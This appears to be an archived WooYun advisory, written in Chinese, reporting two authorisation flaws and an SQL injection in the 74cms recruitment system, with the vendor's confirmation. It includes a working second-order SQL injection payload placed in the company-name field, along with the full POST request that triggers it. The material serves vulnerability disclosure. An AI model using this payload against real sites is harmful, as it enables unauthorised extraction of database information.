漏洞概要 关注数(6) 关注此漏洞
缺陷编号: WooYun-2014-80154
漏洞标题: 骑士人才系统 2处越权+1处sql注入获取敏感信息
相关厂商: 74cms.com
漏洞作者: menmen519
提交时间: 2014-10-21 17:27
公开时间: 2015-01-19 17:28
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: sql注射漏洞利用技巧 php源码分析
漏洞详情
披露状态:
2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-22: 厂商已经确认,细节仅向厂商公开
2014-10-25: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-12-16: 细节向核心白帽子及相关领域专家公开
2014-12-26: 细节向普通白帽子公开
2015-01-05: 细节向实习白帽子公开
2015-01-19: 细节向公众公开
简要描述:
骑士人才系统 2处越权+1处sql注入获取敏感信息
详细说明:
这里我就不做代码分析了,直接看我操作
第一步,我们首先注册一个正常的企业用户
第二步,我们修改企业用户的信息
公司名称',`jobs_name`=user() #-- sdd
然后我们访问url:
POST /74cms_v3.5.1_20141015/upload/wap/company/wap_company_jobs.php?act=jobs_edit_save HTTP/1.1
Host: localhost
postdata:
id=1&add_mode=1&days=0&jobs_name=xxxxx&nature=62&nature_cn=xxxx&topclass=1&category=4&subclass=569&category_cn=xxxxx&amount=111&district=4&sdistrict=93&district_cn=xxxxx&wage=58&wage_cn=2000~3000xxxx&sex=1&sex_cn=%E7%94%B7&education=69&education_cn=xxxx&experience=75&experience_cn=xxxx&graduate=0&contents=xxxxxxxxxxxxxx&contact=xxxxxxxxxxxxxx&telephone=029-88164598
查看发布的职位信息:
下来我们看越权处:
第一处:
没有参与uid计算
wap_company_jobs.php:
第二处:
漏洞证明:
修复方案:
版权声明:转载请注明来源 menmen519@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-10-22 10:55
厂商回复:
感谢反馈!
最新状态:
暂无
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值